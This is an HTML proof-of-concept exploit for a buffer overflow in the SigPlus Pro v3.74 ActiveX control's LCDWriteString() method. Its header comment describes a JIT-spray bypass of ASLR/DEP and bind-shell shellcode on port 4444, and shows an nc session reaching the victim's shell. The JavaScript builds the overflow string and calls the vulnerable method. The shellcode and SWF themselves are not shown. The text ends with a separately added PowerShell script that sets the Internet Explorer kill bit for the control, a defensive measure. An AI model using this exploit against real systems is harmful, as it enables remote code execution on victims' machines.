<html>
<!--
===================================================================================================
SigPlus Pro v3.74 ActiveX Signature Capture LCDWriteString() Remote BoF JIT Spray - aslr/dep bypass
Author: mr_me - @StevenSeeley
Download: http://www.topazsystems.com/Software/download/sigplusactivex.htm
Tested on: Windows 7 Professional vN (IE8)
Windows XP Professional SP3 (IE7/8)
Greetz: Corelan Security Team
http://www.corelan.be:8800/index.php/security/corelan-team-members/
*** Special thanks to Alex Sintsov from DSecRG ***
===================================================================================================
Script provided 'as is', without any warranty.
Use for educational purposes only.
Do not use this code to do anything illegal !
Note : you are not allowed to edit/modify this code.
If you do, Corelan cannot be held responsible for any damages this may cause.
===================================================================================================
Things to note:
- The latest version of SigPlus Pro is not vulnerable.
- Attached below is the base64 of jit-spray.swf.
- The victim will need Flash <= v10.0.42.
- The shellcode opens a bind shell on port 4444.
How does it work?
The JIT memory pages are sprayed with NOPs plus an egghunter, combined with a call to VirtualProtect() to mark
the newly found shellcode executable, and then execution jumps to it. So many pages are sprayed that the guessed
return address lands in the spray, and the exploit works reliably about 9 times out of 10.
root@bt:~# nc -v 192.168.1.8 4444
192.168.1.8: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.1.8] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Steve\Desktop>
===================================================================================================
-->
function rockAndRoll()
{
// 477 bytes of filler ("A") preceding the SEH overwrite value
var buffSize = 477;
var x = unescape("%41");
while (x.length<buffSize) x += x;
x = x.substring(0,buffSize);
// guessed address inside the JIT-sprayed region (little-endian 0x0d220101); you may need to change this value
var seh = unescape("%01%01%22%0d");
// 5140 bytes of trailing filler ("B")
var y = unescape("%42");
var buffSize1 = 5140;
while (y.length<buffSize1) y += y;
y = y.substring(0,buffSize1);
alert('Do you feel lucky, punk?');
// the overlong string argument is what overflows the buffer in LCDWriteString()
target.LCDWriteString(1,1,1,1,1,1,1,x+seh+y);
}
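A defensive counterpart added here, not part of the original PoC: setting the Internet Explorer kill bit for the vulnerable control so the browser refuses to instantiate it regardless of what a page passes to LCDWriteString(). The control's CLSID is not given on this page, so `{CLSID-OF-SIGPLUS-CONTROL}` is a placeholder to replace with the real CLSID taken from the control's registration under HKCR\CLSID.

```powershell
# Added defensive example; not from the original exploit or from Topaz Systems.
# Sets the IE kill bit (Compatibility Flags = 0x400) for one ActiveX control and
# verifies it afterwards. Both the native and the Wow6432Node key are handled so
# 32-bit IE on 64-bit Windows is covered too.
$clsid = '{CLSID-OF-SIGPLUS-CONTROL}'   # PLACEHOLDER: not on the page, replace with the real CLSID

$keys = @("HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid")
if ([Environment]::Is64BitOperatingSystem) {
    $keys += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
}

foreach ($key in $keys) {
    # create the per-CLSID key if the control has never had compatibility flags set
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }

    # preserve any flags already present and OR in the kill bit
    $existing = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $existing) { $existing = 0 }
    Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value ($existing -bor 0x400) -Type DWord

    # read back and confirm the bit is actually set
    $flags = (Get-ItemProperty -Path $key).'Compatibility Flags'
    if (($flags -band 0x400) -eq 0x400) {
        Write-Output "Kill bit set under $key"
    } else {
        throw "Kill bit NOT set under $key"
    }
}
```

Run from an elevated PowerShell; IE reads the flag the next time it tries to load the control, so open browser instances should be restarted.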